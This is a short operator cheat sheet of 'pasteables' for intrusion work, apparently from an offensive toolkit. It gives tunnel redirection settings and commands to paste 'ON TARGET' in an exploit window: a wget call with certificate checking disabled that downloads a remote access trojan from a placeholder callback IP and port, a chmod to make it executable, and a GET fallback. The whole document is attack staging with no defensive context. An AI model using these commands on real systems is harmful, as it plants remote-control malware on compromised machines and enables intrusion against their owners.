#######################################################################################
#######################################################################################
#####       
#####       wget.pastable Pasteables!
#####
#######################################################################################
#######################################################################################

######################################################## 
# Using Redirection? Here are your tunnel pasteables:  #
########################################################
-tunnel
r RATUP_CBPORT

#####################################################
# Copy/Paste this in your exploit window ON TARGET  #
#####################################################
wget --no-check-certificate --no-verbose --secure-protocol=TLSv1 https://RATUP_CBIP:RATUP_CBPORT/RAT_NAME
chmod 755 RAT_NAME

## or if NO wget, try this:
GET https://RATUP_CBIP:RATUP_CBPORT/RAT_NAME > RAT_NAME

